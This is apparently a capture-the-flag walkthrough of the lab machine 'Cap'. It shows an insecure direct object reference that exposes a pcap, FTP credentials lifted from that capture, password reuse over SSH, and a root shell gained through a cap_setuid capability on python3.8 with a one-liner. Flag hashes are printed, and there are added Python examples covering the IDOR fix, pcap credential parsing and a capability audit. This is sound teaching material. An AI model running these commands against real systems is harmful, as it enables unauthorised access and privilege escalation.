Cap

TARGET IP: 10.10.10.245
HOST IP: 10.10.16.3
RECON
WEBSITE
http://[TARGET IP]
Looks like a data analytics page that I am currently signed in to as Nathan. The dropdown menu under the user doesn't do anything, and none of the buttons, Logout included, point anywhere or do anything. Take a look at the source code:
<!-- offset area start -->
<div class="offset-area">
<div class="offset-close"><i class="ti-close"></i></div>
<ul class="nav offset-menu-tab">
<li><a class="active" data-toggle="tab" href="#activity">Activity</a></li>
<li><a data-toggle="tab" href="#settings">Settings</a></li>
</ul>
<div id="activity" class="tab-pane fade in show active">
<div class="recent-activity">
<div class="timeline-task">
<div class="icon bg1">
<i class="fa fa-envelope"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-check"></i>
</div>
<div class="tm-title">
<h4>Added</h4>
<span class="time"><i class="ti-time"></i>7 Minutes Ago</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-exclamation-triangle"></i>
</div>
<div class="tm-title">
<h4>You missed you Password!</h4>
<span class="time"><i class="ti-time"></i>09:20 Am</span>
</div>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="fa fa-bomb"></i>
</div>
<div class="tm-title">
<h4>Member waiting for you Attention</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="ti-signal"></i>
</div>
<div class="tm-title">
<h4>You Added Kaji Patha few minutes ago</h4>
<span class="time"><i class="ti-time"></i>01 minutes ago</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg1">
<i class="fa fa-envelope"></i>
</div>
<div class="tm-title">
<h4>Ratul Hamba sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Hello sir , where are you, i am egerly waiting for you.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-exclamation-triangle"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-exclamation-triangle"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="fa fa-bomb"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="ti-signal"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
</div>
</div>
<div id="settings" class="tab-pane fade">
<div class="offset-settings">
<h4>General Settings</h4>
<div class="settings-list">
<div class="s-settings">
<div class="s-sw-title">
<h5>Notifications</h5>
<div class="s-swtich">
<input type="checkbox" id="switch1" />
<label for="switch1">Toggle</label>
</div>
</div>
<p>Keep it 'On' When you want to get all the notification.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Show recent activity</h5>
<div class="s-swtich">
<input type="checkbox" id="switch2" />
<label for="switch2">Toggle</label>
</div>
</div>
<p>The for attribute is necessary to bind our custom checkbox with the input.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Show your emails</h5>
<div class="s-swtich">
<input type="checkbox" id="switch3" />
<label for="switch3">Toggle</label>
</div>
</div>
<p>Show email so that easily find you.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Show Task statistics</h5>
<div class="s-swtich">
<input type="checkbox" id="switch4" />
<label for="switch4">Toggle</label>
</div>
</div>
<p>The for attribute is necessary to bind our custom checkbox with the input.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Notifications</h5>
<div class="s-swtich">
<input type="checkbox" id="switch5" />
<label for="switch5">Toggle</label>
</div>
</div>
<p>Use checkboxes when looking for yes or no answers.</p>
</div>
</div>
</div>
</div>
</div>
</div>

There is a lot there, but it looks like we have some new information:
We have a user named Nathan and possibly other users: Rashed, Kaji Patha, and Ratul Hamba. Given the lorem ipsum filler around them, these names may just be placeholders from the dashboard template, but they are worth keeping on a candidate user list.
Checking the response headers with curl doesn't give us the version number of the gunicorn web server:
curl [TARGET IP] -sI
If we go to the home tab in the upper right and click on Network Status, we get some really good info about the machine without actually having to run an nmap scan. Looks like ports 21, 22, and 80 are open.

When I try something in the search bar, nothing pops up, but a parameter is added to the URL:
http://[TARGET IP]/?search=[SEARCHED WORD]#
I captured the request with Burp Suite and received the following.

Let's try the Security Snapshot button. This appears to grab packet data over a 5 second period and create a pcap file to look at. We can also see that the URL carries a data parameter that equals 1 after the first use and goes up sequentially with each snapshot. A sequential, user-controlled id is always worth probing: nothing visible ties a capture id to the session that created it, so let's set the parameter to 0 and see what it spits out. We'll also grab the pcap file from it.
http://[TARGET IP]/data/0
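The behaviour above is an insecure direct object reference: the capture is looked up purely by the integer in the URL, with no check that the requester is the one who created it. Below is an added example, not code from the writeup or from the target application, that models the flaw in a minimal WSGI app (the same interface gunicorn serves) with the fix beside it, plus the id sweep an attacker runs against sequential ids. The capture table, the X-User header standing in for a session, and the route shape are all assumptions made for the demo.

```python
import json
from wsgiref.util import setup_testing_defaults

# Constructed sample store (not the real application's data): capture id -> metadata.
# Ids are handed out sequentially, which is what makes them guessable.
CAPTURES = {
    0: {"owner": "admin", "file": "0.pcap"},
    1: {"owner": "nathan", "file": "1.pcap"},
    2: {"owner": "nathan", "file": "2.pcap"},
}


def make_app(enforce_ownership):
    """Build a tiny WSGI app serving /data/<id>.

    enforce_ownership=False reproduces the flaw: any integer id is served.
    enforce_ownership=True checks the record's owner against the requesting user.
    """

    def app(environ, start_response):
        # Assumption for the example: the authenticated user arrives in the X-User
        # header. A real app would take it from a signed session cookie.
        user = environ.get("HTTP_X_USER")
        parts = environ.get("PATH_INFO", "").strip("/").split("/")
        if len(parts) != 2 or parts[0] != "data" or not parts[1].isdigit():
            start_response("404 Not Found", [("Content-Type", "text/plain")])
            return [b"not found"]
        record = CAPTURES.get(int(parts[1]))
        # Hardened path: someone else's capture is treated exactly like a missing one,
        # so the response does not even confirm that the id exists.
        if record is None or (enforce_ownership and record["owner"] != user):
            start_response("404 Not Found", [("Content-Type", "text/plain")])
            return [b"not found"]
        body = json.dumps({"id": int(parts[1]), **record}).encode()
        start_response("200 OK", [("Content-Type", "application/json")])
        return [body]

    return app


def request(app, path, user):
    """Drive the WSGI app in-process and return (status_code, body)."""
    environ = {}
    setup_testing_defaults(environ)
    environ["PATH_INFO"] = path
    environ["HTTP_X_USER"] = user
    status = {}

    def start_response(status_line, headers):
        status["code"] = int(status_line.split()[0])

    body = b"".join(app(environ, start_response))
    return status["code"], body


def sweep(app, user, max_id):
    """What an attacker does with sequential ids: walk them and keep those that return 200."""
    return [i for i in range(max_id + 1) if request(app, f"/data/{i}", user)[0] == 200]


if __name__ == "__main__":
    print("vulnerable:", sweep(make_app(False), "nathan", 5))  # nathan also gets admin's capture 0
    print("hardened:  ", sweep(make_app(True), "nathan", 5))
```

The fix is the single ownership comparison; returning 404 rather than 403 for foreign ids avoids turning the endpoint into an oracle for which captures exist. Random, unguessable capture ids would reduce the sweep's effectiveness but are not a substitute for the authorization check.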
We can open this pcap file in Wireshark to take a look at it and see if we can find any useful information.

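Wireshark is the interactive way to do this; when the capture is large or no GUI is at hand, the same search can be scripted. The following is an added example, not part of the writeup: a dependency-free classic-pcap reader that walks Ethernet/IPv4/TCP frames and pairs FTP USER and PASS commands per client connection. The sample capture is constructed in the code from the writeup's addresses and the credentials found below; the builder functions exist only so the script runs offline.

```python
import struct
import sys

LINKTYPE_ETHERNET = 1
PCAP_MAGIC = 0xA1B2C3D4

# ---- Builders for the constructed sample capture (demo only) ----
def _ethernet(payload, ethertype=0x0800):
    return b"\x00" * 12 + struct.pack("!H", ethertype) + payload

def _ipv4(src, dst, payload, proto=6):
    # Minimal IPv4 header; checksum stays zero because this never goes on the wire.
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return hdr + payload

def _tcp(sport, dport, payload):
    # 20-byte header (data offset 5), PSH|ACK flags, no options.
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0) + payload

def build_pcap(frames):
    """Wrap raw Ethernet frames in a classic little-endian pcap file."""
    out = [struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)]
    for ts, frame in enumerate(frames):
        out.append(struct.pack("<IIII", ts, 0, len(frame), len(frame)))
        out.append(frame)
    return b"".join(out)

def sample_capture():
    """Constructed FTP login plus one unrelated HTTP request, using the writeup's addresses."""
    client, server = "10.10.16.3", "10.10.10.245"
    frames = [
        _ethernet(_ipv4(server, client, _tcp(21, 52000, b"220 FTP server ready\r\n"))),
        _ethernet(_ipv4(client, server, _tcp(52000, 21, b"USER nathan\r\n"))),
        _ethernet(_ipv4(server, client, _tcp(21, 52000, b"331 Please specify the password.\r\n"))),
        _ethernet(_ipv4(client, server, _tcp(52000, 21, b"PASS Buck3tH4TF0RM3!\r\n"))),
        _ethernet(_ipv4(client, server, _tcp(52001, 80, b"GET / HTTP/1.1\r\n\r\n"))),
    ]
    return build_pcap(frames)

# ---- Parser ----
def iter_frames(data):
    """Yield the captured bytes of each record in a classic pcap (either byte order)."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    linktype, = struct.unpack_from(endian + "I", data, 20)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(data):
        incl_len, = struct.unpack_from(endian + "I", data, off + 8)
        off += 16
        yield data[off:off + incl_len]
        off += incl_len

def tcp_segment(frame):
    """Return (src, dst, sport, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != 0x0800:
        return None
    ihl = (frame[14] & 0x0F) * 4
    if frame[23] != 6:  # IPv4 protocol field: 6 = TCP
        return None
    src = ".".join(map(str, frame[26:30]))
    dst = ".".join(map(str, frame[30:34]))
    tcp = 14 + ihl
    sport, dport = struct.unpack_from("!HH", frame, tcp)
    data_off = (frame[tcp + 12] >> 4) * 4
    return src, dst, sport, dport, frame[tcp + data_off:]

def extract_ftp_credentials(pcap_bytes):
    """Pair USER and PASS commands per client connection on the FTP control port."""
    pending = {}  # (client ip, client port, server ip) -> username seen so far
    found = []
    for frame in iter_frames(pcap_bytes):
        seg = tcp_segment(frame)
        if seg is None:
            continue
        src, dst, sport, dport, payload = seg
        if dport != 21 or not payload:
            continue
        key = (src, sport, dst)
        for line in payload.decode("ascii", "replace").splitlines():
            cmd, _, arg = line.partition(" ")
            if cmd.upper() == "USER":
                pending[key] = arg.strip()
            elif cmd.upper() == "PASS" and key in pending:
                found.append((dst, pending.pop(key), arg.strip()))
    return found

if __name__ == "__main__":
    # Usage: python3 ftp_creds.py 0.pcap   (falls back to the constructed sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else sample_capture()
    for server, user, password in extract_ftp_credentials(data):
        print(f"{server}  {user}:{password}")
```

The parser deliberately keys on the destination port rather than on the strings alone, so a "USER" appearing inside unrelated HTTP traffic is not mistaken for a login. With tshark installed, the display filter `ftp.request.command == "USER" || ftp.request.command == "PASS"` shows the same two packets.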
WIRESHARK
Scanning through the Wireshark capture, we quickly find FTP credentials for the user nathan. FTP sends the USER and PASS commands in cleartext on the control channel, so anyone who can read the capture can read the password:

nathan:Buck3tH4TF0RM3!

We can now log into nathan's FTP account, list the current working directory, and download the user flag.
ftp [TARGET IP]
nathan
Buck3tH4TF0RM3!
ls -la
get user.txt
On our host system we can then look into the text file for the first flag.
cat user.txt
user.txt: 1f896817980ce9dfee4c79c1922c5ae3

WAPPALYZER

The backend language appears to be Python.
It uses Gunicorn as the web server, which matches the version-less gunicorn Server header we saw with curl.
The Gunicorn "Green Unicorn" is a Python Web Server Gateway Interface HTTP server. It is a pre-fork worker model, ported from Ruby's Unicorn project. The Gunicorn server is broadly compatible with a number of web frameworks, simply implemented, light on server resources, and fairly fast.
NMAP
nmap [TARGET IP]
nmap -A -sV -p 21,22,80 [TARGET IP]
sudo nmap [TARGET IP] -sS -sV --script http-headers -p 80
ENUMERATION
GOBUSTER
SUBDOMAIN
gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt
None of the directories it finds are new to me, and they don't provide any new information.
gobuster vhost -u http://[TARGET IP]/ -w /usr/share/dirb/wordlists/common.txt
Note that common.txt is a directory wordlist; a dedicated subdomain list is a better fit for vhost brute-forcing.
TARGET ENUMERATION
Now that we have credentials for nathan, we can spend some time exploring the target system for possible privilege escalation. I'm going to use the same credentials to log in through SSH and see whether the FTP password is reused for the system account.
ssh nathan@[TARGET IP]
yes
Buck3tH4TF0RM3!
Let's check what sudo privileges we have.
sudo -l
Buck3tH4TF0RM3!
Unfortunately, we have none, so let's go digging around.
I spent some time digging around myself but didn't find anything, so I uploaded a copy of linpeas to the target and ran it to automate the enumeration.
It came across something interesting:

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

I can verify the capability with getcap. File capabilities hand a binary individual root-only privileges without making it fully setuid, which is why linpeas reports them alongside SUID binaries. The +eip suffix means the listed capabilities are in the effective, inheritable and permitted sets, so they are live as soon as the interpreter starts.
getcap -r / 2>/dev/null
This is great information, as cap_setuid on an interpreter is a particularly vulnerable situation: it lets the process call setuid(0), so any user who can run python3.8 can become root. HackTricks and GTFOBins both have sections on exploiting this for privilege escalation.
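Reading a full getcap listing by eye is error-prone, so here is an added example (not from the writeup, linpeas or GTFOBins) that parses getcap -r output and flags capabilities that lead straight to root when they sit in the effective or permitted set. It handles both the `path = caps+flags` style shown above and the newer libcap `path caps=flags` style. The sample listing is constructed: the python3.8 line is the one linpeas reported here, the other entries are typical stock ones added for contrast.

```python
import re
import sys

# Capabilities that let a process become root or read/write arbitrary files outright.
# In the effective (e) or permitted (p) set of an interpreter or common binary, each
# of these is a direct privilege escalation path.
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_chown", "cap_fowner", "cap_sys_admin", "cap_sys_ptrace",
    "cap_sys_module", "cap_setfcap",
}


def parse_getcap_line(line):
    """Parse one line of `getcap -r /` output into (path, {cap: flags}).

    Handles both libcap output styles:
      /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip   (older getcap)
      /usr/bin/python3.8 cap_setuid,cap_net_bind_service=eip     (newer getcap)
    """
    line = line.strip()
    if not line:
        return None
    if " = " in line:
        path, _, text = line.partition(" = ")
    else:
        path, _, text = line.rpartition(" ")
    caps = {}
    # cap_to_text clauses: "cap_a,cap_b+eip", "cap_c=ep", "=ep" (empty name list = all caps)
    for clause in text.split():
        m = re.fullmatch(r"([a-z0-9_,]*)([=+-])([eip]*)", clause)
        if not m:
            continue
        names, op, flags = m.groups()
        for name in (names.split(",") if names else ["all"]):
            cur = set(caps.get(name, ""))
            if op == "=":
                cur = set(flags)
            elif op == "+":
                cur |= set(flags)
            else:
                cur -= set(flags)
            caps[name] = "".join(sorted(cur))
    return path, caps


def dangerous_capabilities(getcap_output):
    """Return [(path, cap, flags)] for every dangerous capability that is effective or permitted."""
    hits = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        for name, flags in caps.items():
            if (name in DANGEROUS or name == "all") and set(flags) & {"e", "p"}:
                hits.append((path, name, flags))
    return hits


# Constructed sample output: the first line is the finding from this writeup, the rest
# are typical, mostly harmless entries of the kind seen on a stock Ubuntu install.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

if __name__ == "__main__":
    # Usage: getcap -r / 2>/dev/null > caps.txt && python3 capaudit.py caps.txt
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GETCAP
    for path, cap, flags in dangerous_capabilities(text):
        print(f"{path}: {cap} ({flags})")
```

Only cap_setuid is flagged in the sample; cap_net_bind_service and cap_net_raw let a process bind low ports or craft packets, which is noisy but not a path to UID 0 on its own. The same check is worth running on the defensive side after package upgrades, since interpreters and debuggers with file capabilities are a common misconfiguration.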
Let's go with the privilege escalation from GTFOBins. The one-liner calls /usr/bin/python3, which here resolves to python3.8; the capability is an attribute of the file that actually gets executed, so either name works.
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
And now I have root privileges.
Let's go get the root flag.
cat /root/root.txt
ca9be49e3fbed8b6be99a27bcd9be60f